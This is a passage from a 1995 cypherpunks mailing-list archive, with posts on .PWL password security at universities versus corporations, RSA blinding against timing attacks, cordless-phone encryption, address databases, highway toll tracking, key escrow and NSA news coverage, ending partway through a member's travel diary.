Date: Sat, 16 Dec 1995 16:13:14 +0800
To: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Subject: Re: .PWL spin
In-Reply-To: <Pine.A32.3.91.951215144310.3576A-100000@FROG.ZOO2.CS.YALE.EDU>
Message-ID: <Pine.ULT.3.91.951215142347.14138O@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 15 Dec 1995, Rev. Ben wrote:

> > What would make a University less secure than a corporation??
> 
> Ostensibly, universities in the interest of academic freedom and 
> promoting learning usually don't have nearly the same draconian measures 
> that corporations have.

More to the point, us poor professional staff don't stand a chance 
politically against students and faculty. We support whatever they want 
to use.

I think it's more an issue of control. Ford IS can say Thou Shalt Not
turn on SAP advertisement, and people will listen (or go away). At major
Universities, what we do with troublemakers is, we hire them.

But back to the point, the anonymous (cypherpunk relevance) "system 
administrator" (guess they couldn't find anyone willing to make a fool 
of himself on the record?) who said that Universities would be hurt more 
was wrong. We just don't have passwords on Win95 machines, or don't care 
if they're compromised. It's the people at Ford, Dow, and Sprint, 
which had wasted man-years putting together "policies" and "user 
profiles" that have proven to be worse than useless, who are pissed off. 

> Anyone want to give a  college grad a job?

Actually, yes. Low $40's (consider CA cost of living), direct user
support, but high level of freedom. You're probably overqualified,
though. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNH4PI3DXUbM57SdAQGy0QP/R/KG1cdZDru06vArZdTiO05/RRsg29Lv
lrrpoEfoLQmIktsilObBX00J/CQPd667UkfD/s1DYR8nzdsbrbZG9M3iOU5I5r/m
aDjdkBfQ1aRCfYNV+eiXen4MuuwXhWt/Hs++9bdfqiWhIIS1E3sRxK8emFIgXzm1
0o72frQsBXw=
=4EHv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman-ben@CS.YALE.EDU>
Date: Sat, 16 Dec 1995 06:01:17 +0800
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Re: .PWL spin
In-Reply-To: <199512151829.KAA13449@jobe.shell.portal.com>
Message-ID: <Pine.A32.3.91.951215144310.3576A-100000@FROG.ZOO2.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain



> What would make a University less secure than a corporation??

Ostensibly, universities in the interest of academic freedom and 
promoting learning usually don't have nearly the same draconian measures 
that corporations have.  They don't have to worry nearly as much about 
trade secrets being mailed out he front door, or information warfare 
attacks in which a competitor is attempting to penetrate the system.

> Universities (at least the ones, I've checked) have entire departments
> and theoreticians devoted to Computers ... companies usually don't.  

And those theoreticians sit behind their desks and keep scribbling on 
their pads.  There's not much going on the ground with theory.  Plus, if 
you knew anything about theory, a lot of theory has very little immediate 
practical importance...complexity theory is good to make sure that 
one-way functions actually do exist, but in progress, there's not much 
way to implement it.

Ben.
____
Ben Samman..............................................samman@cs.yale.edu
"If what Proust says is true, that happiness is the absence of fever, then
I will never know happiness. For I am possessed by a fever for knowledge,
experience, and creation."                                      -Anais Nin
PGP Encrypted Mail Welcomed      Finger samman@powered.cs.yale.edu for key
Anyone want to give a  college grad a job?  Mail me for a resume.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mphillips@CCTR.UMKC.EDU
Date: Sat, 16 Dec 1995 06:36:57 +0800
To: cypherpunks@toad.com
Subject: Apology...
Message-ID: <0099AE8C.9140398E.3@CCTR.UMKC.EDU>
MIME-Version: 1.0
Content-Type: text/plain


To all concerned:

I, have recieved SEVERAL messages regaurding a post that was sent to this
newsgroup.  I am apologizing for such a mistaken address and post.  Please
accept my sincere apology and believe me when I say that I have NEVER meant to
offend anyone.  This was a situation that WE have taken care of HERE and I hope
never happens again.  Again, please accept my apology and I hope we can
consider this subject closed. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim@bilbo.suite.com (Jim Miller)
Date: Sat, 16 Dec 1995 17:05:29 +0800
To: cypherpunks@toad.com
Subject: Java scripts to caputure remote timing info?
Message-ID: <9512152146.AA08898@bilbo.suite.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't enough about Java to know if it is possible, but it's something to  
think about.

Jim_Miller@suite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ljo@ausys.se (Johansson Lars)
Date: Sat, 16 Dec 1995 00:28:39 +0800
To: hfinney@shell.portal.com
Subject: Re:  Blinding against Kocher's timing at
Message-ID: <95Dec15.155851gmt+0100.53765@void.ausys.se>
MIME-Version: 1.0
Content-Type: text/plain




Hal <hfinney@shell.portal.com> wrote:

>From: ljo@ausys.se (Johansson Lars)
>> Does anyone know whether David Chaum's patent on
>> blind digital signatures extends to this application?

[Parts omitted]

>It's conceivable that Kocher's blinding would be a patentable technique
>in itself, and not impossible that he has already applied for a patent
>before publishing.  Probably he would have said so if that were his
>intention, though.

I just found this at RSA:s <http://www.rsa.com/rsaqa.htm> home page:

>Q: Has RSA been "broken"?
>
>   A: No. The attack that Paul Kocher describes is academically 
interesting, but it is >easy to defend systems against his attack using a 
technique called
>   "blinding", developed by Dr. Ron Rivest of RSA.
                          ^^^^^^^^^^^^^^^^^^^^^^^^^
When did Dr. Rivest develop this "blinding" technique?
Was it pre or post Chaum?
Perhaps Rivest himself have applied for this patent.

More info from RSA:s home page:

> Another way is to use a technique called "blinding", in which a random 
number
> is introduced into the decryption process, making it impossible to get any 
useful >data out of timing these transactions.
>
>so instead of doing the usual RSA decryption:
>
>  m = c^d mod n
>
>we perform:
>
> m = r^-1*(c*r^e)^d mod n
>
>where r is a random number, and  is its inverse.

/Lars





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: andr0id@midwest.net
Date: Sat, 16 Dec 1995 13:08:55 +0800
To: cypherpunks@toad.com
Subject: personal privacy
Message-ID: <199512152202.QAA16464@cdale1.midwest.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, as of about two days ago IL passed a bill that says employers can
listen to their workers phone calls all they want. 

                        Dr0id





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sat, 16 Dec 1995 18:57:12 +0800
To: dan@milliways.org
Subject: Re: Motorola Secure Phone
In-Reply-To: <199512152338.XAA22526@pop01.ny.us.ibm.net>
Message-ID: <199512160034.QAA15353@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	My AT&T 900 (or is it 9000?) MHz digital cordless phone says
the same thing. I figure it uses a weak cryptosystem. There is
something about key setup when you return the handset to the base.
	(The phone was $200, FWIW)

> 
> 
> I saw a new cordless phone made by Motorola in a retail outlet today
> that is supposedly "Secure from eavesdroppers."  I asked the
> salespeople for more technical info, but they weren't very helpful. 
> Does anyone have any information on this?  I didn't notice any "Not
> for Export" stickers on the box, and the ITAR does cover
> spread-spectrum technology.  So is it analog or digital?  Is it just
> doing simple analog tricks, or is it encrypting a bitstream?  Clipper
> maybe?  I doubt it.  Any info appreciated.
> 						Dan
> 
> ***************************************************************
> #define private public						dan@milliways.org
> Worcester Polytechnic Institute and The Restaurant at the End of the Universe
> ***************************************************************
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jadestar@netcom.com (JaDe)
Date: Sat, 16 Dec 1995 13:17:13 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: "Strongly Voluntary" Key Escrow
In-Reply-To: <199512152102.NAA27308@netcom19.netcom.com>
Message-ID: <199512160052.QAA04337@netcom.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At  9:10 12/15/95 -0500, Jim Ray wrote:
> >"Government Key Certification" might be an OK compromise-term compared
> >to "key escrow," but we should [IMNSHO] continue to stick to "GAK." As
> >you know, I prefered the term "FUCKED," but now we must be "decent" in
> >our communications. <sigh>
> 
> I suggest Forced Key Deposit (FKD) (when some non-governmental entity e.g.
> an employer forces you to send copies of your keys to some depository), and
> Voluntary Key Deposit (VKD), when you chose to deposit a copy of your key
> with some third party.  I love the way GAK sounds, so I support it even the
> whole concept is really FUCKED.  Whenever I hear, "Government Key

	Bill,

	You may really have something here.  Let's recommend a 
	Forced Universal Cryptographic Key and Engine Depository.

	When they, naturally, build the acronym -- they'll have 
	spelled out the situation clearly <g>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 16 Dec 1995 08:21:12 +0800
To: jpp@software.net
Subject: Re: ADDRESS DATABASE?
Message-ID: <01HYUF22RDD08Y50QR@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jpp@software.net"  "John Pettitt" 14-DEC-1995 16:34:23.37

>On the name database side the PO runs somthing called National Change of
Address which tracks who moved where and allows direct marketing companys to
clean their lists.  Almost everybody sells address change data (utilities,
the PO, credit companys) - I'm getting tons of "welcome to the neighbourhood"
mail since I moved.
--------------
	The basic method for getting around this is to have the mail forwarded
to a post office box. They still know you've moved, but not to where, and the
connection between your physical location (for stuff like gas bills, etcetera)
and the name & address that they did have is loosened.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gibo@ripco.com (Giles Bowkett)
Date: Sat, 16 Dec 1995 08:36:47 +0800
To: email@fringeware.com
Subject: QUERY: e-politics mailing list
Message-ID: <v01530505acf60e2e11c6@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a mailing list organized around political issues
regarding electronic networks, virtual community, the changing roles of
the city and the corporation, and especially issues of class in a "wired"
world?

Much thanx, pls pardon the spam.

PS - be careful about replying to all recipients - this message went to a
couple different lists.

=========================================>>>http://pages.ripco.com/~gibo

"I drink coffee for taste only. You just can't make coffee strong enough
to compete with pharmaceutical speed, so fuck it."  --  Dave Fischer






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 16 Dec 1995 12:41:21 +0800
To: cypherpunks@toad.com
Subject: Alien Abductees, Flat Earthers, and other Fringoids
Message-ID: <acf757a608021004e632@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:37 PM 12/15/95, Giles Bowkett wrote:
>Does anyone know of a mailing list organized around political issues
>regarding electronic networks, virtual community, the changing roles of
>the city and the corporation, and especially issues of class in a "wired"
>world?
>
>Much thanx, pls pardon the spam.

Don't mention it! After all, all right-thinking Cypherpunkz are intensely
interested in these mailing lists you sent this to:

abducted@hyperreal.com  (many Cypherwonks are alien abductees!)

flat-earth@zikzak.net   (where the "edge" culture meets the edge of the Earth)

email@fringeware.com  (yes, we're at the fringe)


So nice to know that we're lumped in with these folks.

--Tim "Dr. Bob" May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Sat, 16 Dec 1995 11:57:03 +0800
To: cypherpunks@toad.com
Subject: Motorola Secure Phone
Message-ID: <199512152338.XAA22526@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain



I saw a new cordless phone made by Motorola in a retail outlet today
that is supposedly "Secure from eavesdroppers."  I asked the
salespeople for more technical info, but they weren't very helpful. 
Does anyone have any information on this?  I didn't notice any "Not
for Export" stickers on the box, and the ITAR does cover
spread-spectrum technology.  So is it analog or digital?  Is it just
doing simple analog tricks, or is it encrypting a bitstream?  Clipper
maybe?  I doubt it.  Any info appreciated.
						Dan

***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Sat, 16 Dec 1995 11:57:56 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
In-Reply-To: <199512152023.OAA13271@cdale1.midwest.net>
Message-ID: <199512160020.TAA00404@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


andr0id@midwest.net writes:
> >
> >My untrained brain sees two problems with this:
> >
> >1) Cellular systems are inherently less secure than standard telephones,
> >as anyone who can afford a decent scanner can listen to your conversations
> >at will.
> 
> I was speaking more secure in that the billing information is much harder to
> get.  If someone had the time, money, and equipment to track a particular
> person at a specific location making a cellular phone call from a given
> number they would most likely already have the means of getting the
> information an easier way.

I'm not familiar with this aspect - how do cellular services store and
make use of billing information, as opposed to traditional phone services?

> At least 50% of the cellular carriers are not telco related.  Giving out
> cellular numbers and names is a tabbo NONO for cellular carriers.  If
> cellular customers start getting sales calls from a company that received a
> list from a cellular carrier, the cellular carrier is obligated to refund
> the customers bill for those calls if the customer complains becuase the
> customer pays for calls comming or going.

Is this obligation incurred by the contract between the customer and the
cellular service, by statute, or otherwise? Contracts can always be
broken, and passing laws to guard the guardians generally amounts to
having the fox guard the henhouse...

> I don't feel that cellular is completely private or secure but its getting
> much better with the addition of digital cellular.  The problem with digital
> is that the conversations are more secure but the information about the
> people calling is not.  Digital cellular and PCS offers ANI and a bunch of
> other identifying information.

This seems par for the course - the rise of ESS sounded the death knell for
traditional blue boxing. Conversion to digital makes everything easier,
including tracing. Therefore, it behooves us to recognize good and bad
aspects of technology, the better to "take what you can use, and let the
rest go by." (Ken Kesey)

(Whatever happened to Apple's bid to give away a huge chunk of the bandwidth
spectrum? Did the FCC ever get around to addressing their request? As Bill
Frezza said, *that* took cojones...)

-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
 EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
   Hate, hate your enemies  save, save your friends  find, find your place
 I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 16 Dec 1995 04:40:47 +0800
To: cypherpunks@toad.com
Subject: Re: ADDRESS DATABASE?
Message-ID: <199512151901.UAA10562@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Sandfort-8802 unit:

>>       This took about a minute using a shabby consumer-level DB.
>>       *Now* do you get it?             ^^^^^^^^^^^^^^^^^^^^^^^^
>                                         > hint hint hint hint <
>Nope.  MY name isn't on your list.  In addition, my home phone
>number is unlisted--therefore contracturally unavailable for
>resale.  *Now* do you get it?

     It's kind of cool how much faith you have in the idea that
your number is unlisted, considering the fact that you started
this thread by griping that someone had the goods on you. The
reason you were "taken aback" is because your beliefs don't
correspond to reality -- "cognitive dissonance," in the lingo.

H

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMNHGg73g0mNE55u1AQEfcwH9HPcXAyMQPv9ZNQ2MxvBHfTtsIfqw15zG
n7S7yppwR2AsayZgSZQFIDoee0tLRBqEvPFhxNqnOiPCht5PK01YGA==
=gIKw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Sat, 16 Dec 1995 13:39:47 +0800
To: cypherpunks@toad.com
Subject: Re: NET - HLR on highway privacy (fwd)
Message-ID: <4B9D401DA6@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 15 Dec 95 at 13:54, Jon Lasser wrote:

: I hadn't seen this cross the list yet...
: 
: ------------------------------------------------------------------------------
: Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
:           Visit my home page at http://www.goucher.edu/~jlasser/
:   You have a friend at the NSA: Big Brother is watching. Finger for PGP key.
: 
: ---------- Forwarded message ----------
: Date: Mon, 11 Dec 1995 05:59:53 -0600
: From: FringeWare Daily <email@fringeware.com>
: Subject: NET - HLR on highway privacy
: 
: Sent from: hlr@well.com (Howard Rheingold)
: 
: We Need Privacy Protection On Intelligent Highways
: 	-- By Howard Rheingold
: 
: 	Ominous steps have been taken recently, steps that perhaps move us
: all closer to a global surveillance state, but few people are aware of them.
: Governments around the world are installing "intelligent highways," whose
: snooping capabilities ought to concern every driver.

[	Much about automatic tool billing and how it can be used to track 
vehicles deleted.}

	The MTA (the people who 'run' the toll roads about Houston) have an 
automatic payment system in place that use transponders mounted on 
windshields.  Most people who have these don't know it, but they have 
pickups for these little devices all over the freeway system, not just 
at the toll booths.

	But if you go to http://herman.tamu.edu/houston-real.html
you can get an idea of what they are able to do with the data.  And 
then they have the lobes to ask you to volunteer to put one of these 
things on your car.  What boggles the mind, is that people do...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMNIdqjUjeCeeebC9AQG7XAf/YgxgSAhNrsEFMtjUtS4UrzTVNhEkzBK6
IQv+LMb45B/niD+fQYKmViTu8ki/jEoBZ4zLEmSLmrE8Gl0vhmSgnYCoLjVeURxo
k4JEf3uYRCrGWt94hihiLl+2GahqkPdaxBdksGVR0DHAF6SIWKbwvh0LRgDiUcOT
lQ6Cb9AwthPuX2BYx/1kmijABSwsEJYv2mF7J3mWwqR/3C9u92thMqfMVPIWkPfn
mzgK+/OROzug2nPjIZ2ULhbJYY05mrVr0JD70kmBoThH1kqt8+1xU9v9HeziZl/y
WZ8b24i3rKxLZq4PaPMsKX6TlWpIlnJt4QPTwVt4gr0sRwuY4I37sw==
=GJjw
-----END PGP SIGNATURE-----
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
The difference between science and the fuzzy subjects is that science
requires reasoning, while those other subjects merely require
scholarship.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff A. Gehlbach" <jeffg@hiwaay.net>
Date: Sun, 17 Dec 1995 07:02:27 +0800
To: cypherpunks@toad.com
Subject: Re: .PWL Spin
Message-ID: <9512160238.AA15186@fly.HiWAAY.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 02:01 PM 12/15/95 -0600, you wrote:
>According to rumor, anonymous-remailer@shell.portal.com said:
>> On Sat, 9 Dec 1995, Joel McNamara wrote:
   <SNIP>
>> What would make a University less secure than a corporation??
>
>1) Usually more net connected hosts.
>2) Lack of adequate sysadmin attention/knowlege.
>3) Vague and poorly enforced site security policies.

IMHO Microsoft has no concern about the security of any university; educational institutions will standardize on whatever OS the majority of their students are familiar with (=Windows whatever).  

No, the big priority in Redmond is winning (and keeping) corporate customers.  A corporation can standardize around whatever the management likes.  A large Virginia-based metals corporation recently standardized on the M$ Office suite with little regard to the hundreds of users who had already effectively entrenched with WordPerfect.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNIxEY8AYvAI/GnhAQEveQQAtyPwljkPyBCyeD0fv5Bb83TQ4UX6P+g4
tqgQSH+7LpYORHxJvMmWVTocUHWdo+rkx8AngFPvhF9fTl6DB1Qyd8RzeL0Od0f9
WJOcbi5BtS/sqbmU82XWypohk5FCE3fMKCvkCMpNy6ptuvbwLBHmastJxt0FJ8kO
wwWQENHp6sg=
=O/P9
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 16 Dec 1995 14:18:31 +0800
To: cypherpunks@toad.com
Subject: RES_ist
Message-ID: <199512160216.VAA29258@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-15-95. NYPaper, crypto-bizarrely:

   "Extremist Army Group at War With U.S. Policy."

      It is not known how large the underground group is but
      the Special Forces acknowledge the group's existence and
      says that it was not in violation of any regulations.
      Its newsletter, The Resister, available on the Internet,
      said it favored "strict constitutionalism, isolationism,
      laissez-faire capitalism, individual rights, limited
      government and republicanism," and opposed "statism,
      liberalism, tribalism, socialism, collectivism,
      internationalism, democracy, altruism, pull politics and
      the New World Order."

   RES_ist  (10 kb)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sat, 16 Dec 1995 13:38:17 +0800
To: cypherpunks@toad.com
Subject: More Balto Sun on the NSA: Infowar
Message-ID: <v02130500acf7d6f1eacc@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



The last part of the Baltimore Sun's series of articles on the
NSA arrived today. It concentrated upon the prospect for a
bloodless "Infowar." The article began with a hypothetical
attack beginning on January 17, 2001, the tenth anniversary of
the US bombing of Baghdad. In the attack, bad, computer related
things happen like  stock markets crash and all of the money is
drained from the accounts of the sailors in the US Navy. The
article then uses this as a beginning for a long contemplation
of the NSA's future.

Many of the details are well-known to cypherpunks. The NSA is
poking around with drug interdiction, economic intelligence and
computer security. The Russian linguists are being retrained.
Etc. The article ends with a story told by Senator Rudman of NH.
He says that 100 years ago, the houses were wood and we needed
fire stations on every corner. Now, they're made of brick and
concrete and  come with sprinkler systems. The Fire Union might
argue that you still need a fire station on every corner, he
told the reporter, but that's not necessarily true.

So, perhaps Clipper is a form of job insurance? True perfect
security would not only hurt SIGINT, but it would remove the
need for crypto firemen. If you want to have a system that gives
some people access and not other people, then you need a lot of
folks to stand around, sign forms and generally make sure that
everything is running smoothly. Strong cryptography is
automation. GAK requires a large bureaucracy to administer it.

The article also has some anecdotes about how the agency
protected US firms abroad. One company was alerted that its
European competitor was bribing the Latin American officials who
were choosing the winning bid. Also, when the Peso collapsed,
the US negotiators had access to some information that the
Mexican government wasn't being as forthcoming as they should
have been about the country's assets. They used this information
in negotiations.

--Peter Wayner

You can purchase the complete articles from the Baltimore Sun by
dialing 410-332 6962. The price is $3.95.

(See my second post for more info on an earlier article about Crypto AG).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Sun, 17 Dec 1995 07:02:35 +0800
To: cypherpunks@toad.com
Subject: Balto Sun Followup: Crypto AG a friend of Cypherpunks?
Message-ID: <v02130501acf7db56f315@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain



In an earlier posting, I summarized an article in the Baltimore
Sun about the Swiss company Crypto AG that makes encryption
machines for the world market. The newspaper ran a follow up
article today (12/15/95) that discussed a two page statement
issued by Crypto AG. Some of the quotes from the statement that
made it into the Baltimore Sun article are:

   "Pure Invention"
   "old hearsay"
    "The allegations are not new at all and just repeat tales
which date back 25 or more years"
    [Crypto AG] "has no political ambitions or claims."

My favorite detail, however, was the hint that the rumors are a
"well conceived ploy" to harrass a company that is making strong
crypto for independent countries. So maybe they're cypherpunks?

The rest of the Baltimore Sun article goes on to summarize why
the paper printed what it did. These include interviews with
apparently anonymous sources identified as "several former
Crypto engineers." These engineers told the Sun that they were
forced to make design changes by their boss based upon
"technical documents provided by mysterious visitors to the Zug
plant."

-Peter Wayner

If you care about this matter, you should dig up the original
article from the Baltimore Sun. $3.95. Dial 410-332 6962.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sat, 16 Dec 1995 13:52:17 +0800
To: cypherpunks@toad.com
Subject: e$: Seven Days
Message-ID: <v02120d02acf7de724462@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

12/15/95
Boston, MA

Interesting things happened during seven days last week, which I spent
mostly on the road. The focus of the trip was almost entirely on e$ and
geodesic markets, so I thought I'd do a reprise of the "24 hours" post
here for fun.

Tuesday

Woke up at about 6 and thrashed the e-mail pile for about an hour. I'm
finding that I get up, do e-mail and then take a shower. Could trollhood
be far behind?  Usually, I have at least 100 messages in the mailbox
first thing in the morning. Almost all of this is not for me, about 95%
is e$pam fodder, of which 10% makes the cut. About 80% of the total is
still cypherpunks -- so, what else is new? The NetGAK fight dominates
all, and I get flamed by one of my subscribers about pumping so much of
it onto e$pam. I ask him to send the flame to the list, but nothing ever
happens. I figure that the more cogent NetGAK arguments deserve
e$pamming because of my oft-debated contention that digital commerce is
finanicial cryptography, and financial cryptography is a subset of
strong cryptography, and attempts by nation-states to regulate commerce,
and thus strong cryptography, are usually entertaining when they're not
dangerous. These days, I suppose Duncan Frisell would call GAK-attempts
entertaining, and Tim May would call it dangerous, and I fall in between
somewhere.

Sometimes, all of this reminds me of Barr Rosenburg, the popular 70's
analyst-of- stock- analysts who made a whole lot of mutual fund managers
feel much better about themselves and the efficient market hypothesis.
His point was that if they didn't try to beat the market every day of
their lives, there wouldn't be a market to beat. The best fund managers
did beat the market on a regular basis, just barely, and that was the
incentive for all the rest to try their hand at it. We all benefit as a
result. We can buy a mutual fund, or just buy an index fund, and for the
most part, we can be sure that the market will go up a reasonable annual
amount on some long term average.

I see progress against government interference in the net.market the
same way. Just one of us can't really do it, but if all of us chip away
at it, some of us more than others, then those "profits at the margin"
begin to add up to a trend of government cluefulness about economic
reality as far as geodesic markets on the net are concerned. One of the
biggest clues of all is that strong cryptography is the lynchpin
technology for any real peer-to-peer cash-settlement economy. They just
don't get that yet. They will. The market is efficient.

I get cleaned up, pack (always at the last minute, and always in a
hurry) call a cab and go down to the Harvard Club on Federal Street to
moderate the Digital Commerce Society of Boston luncheon. We had about
30 people and 3 no-shows, which is about par after three months of doing
this.

We also had about 10 new people, which is also par. Among them was a
sizable contingent from the financial community, which is good, because
I put the meeting in the middle of Boston's financial district on
purpose. We had people from State Street Bank's bond room, some people
from Fidelity Systems' advanced technology bunch, one guy from Mellon
Bank's advanced technology group, and someone from Lehman, who I believe
was another bond trader.

Rich Salz, from OSF, was the speaker, and he talked about financial
middleware for the internet. When I listen to someone like Rich, I'm
always reminded of just how much I *don't* know. Among other things,
Rich told the story about how someone had to fight tooth and nail to
keep people from putting URLs into Super Bowl ads, because the
net.infrastructure wouldn't pass the smoke test. Something about too
much demand if they advertised Madonna's langerie for sale...

DCSB is growing nicely, I think. We've got speakers booked out until
next June, running the gamut from FSTC to Perry Metzger, we're keeping
our Harvard Club bill paid, and everyone looks happy to meet someone
else whose eyes don't glaze over when they talk about digital commerce
technology and its consequences.

The plane flight is boring, and I keep forgetting to get some kind of
battery brick for shipwright.com, my PowerBook 180. To top it off, I've
had it more or less plugged into the wall for a year, so the battery's
gone. So, I read Forbes, and then the Atlantic, and then after a plane
change in Chicago, I sleep until I get to San Jose, where Vinnie, a
friend of mine from Apple, and my equivalent of Hunter Thompson's Samoan
attorney, picks me up. I go crash on a futon in his living room, and
wake up way too early.

Wednesday.

After waking up at 4:30, downloading e-mail and thrashing it all into
food for Thumper, our ailing mail-server, I forestall trollhood one more
time and get cleaned up to go outside. This time, it's to go hang out
for three days at the Apple OpenDoc Cyberdog Coding Retreat, or
"Kitchen", as they say at Apple.

First, Vinnie takes me to his office at Apple Developer Technical
Support (DTS), by way of a triple esspresso dumped into a large coffee
(Vinnie's version of a weightlifter's ephidrine stack, I suppose)  and a
rather large cholestorol-festival breakfast at the Apple cafeteria.

At Vinnie's office, I meet several of his workmates, including his
shooting buddy Jeff, who, along with Vinnie, takes failed hard drives
out to the shooting range periodically for durability testing. Jeff says
there's something satisfying about the sound of AK-47 fire ricocheting
off of the pride of Conner, Seagate or Quantum in the early evening
after a hard day's bug-hunting.

Vinnie, who got started messing around with computers when he was about
13, at MIT's AI lab in the early 70's, is also an ex-marine black-belt
who teaches handgun safety and marksmanship. He has one of those
humaniform target sheets pasted on his office window with tidy groupings
over the middle chest and forehead, the result of a field trip that
folks in DTS took one day to the range. After much arm-twisting, they
persuaded Vinnie to take a few shots himself, and he squeezed off the
above Glock magazine in about 8 seconds or so. That, the break-out
picture of the AK-47 on his wall, the business card that says "DTS
Sniper. One shot, One kill", and the Glock t-shirt with the rolled up
sleeves over a few too many muscles under hair that's buzz-cut a little
bit short, makes most liberals and other statists a little nevous. The
small oval Oakley reflective sunglasses, don't hurt, I suppose. I have
to say that someone actually pointed out all this out to me, a little
later in the week. I'd never noticed it, really. I've known Vinnie for
about 5 years now, and I think about Vinnie the same way that someone
talked about Dick Butkus once. "Kind of a teddy bear with muscles." A
very *smart* teddy bear with muscles.

After taking the tour of DTS and meeting mostly normal people with the
exception of Vinnie and Jeff, well, mostly normal people, anyway, we
jumped into Vinnie's Toyota 4X4 with the firearm, punk band and
right-wing bumper stickers all over the rear window and went over to
Apple's City Center campus and the Cyberdog Kitchen.

We were greeted by Jim Black, who was running the Kitchen for Apple,
which consists primarily of 60 (for this kitchen, anyway, because of
CyberDog; normally it's about 20) people with Macs in front of them
trying to develop code in new environments for the first time. They do
this over the course of 3 days, from 8 in the morning to midnight or
later, punctuated by the occasional meal or presentation. Jim was the
guy who flew me out here, so I figure I have to pay attention to him.
Vinnie and John say relax, so I start paying attention to the kitchen
itself, including fooling around with the various Cyberdog "parts", or
objects.

Cyberdog itself is a really cool idea. Effectively, it's an
implementation of IBM's SOM object model for the internet. With
Cyberdog, you can encapsulate any function in a part, kind of like a
very small application on steroids. You can make parts like
web-browsers, or mailers, or ftp-parts. In other words, parts for all
the stuff you do on the net.  My, uh, part-icular interest in this was
the concept of OpenDoc and especially Cyberdog as "Geodesic" software,
which was the topic of another rant, which turned into an article, which
got me here at the Cyberdog kitchen.

More to the point, my interest in parts comes from the ease with which
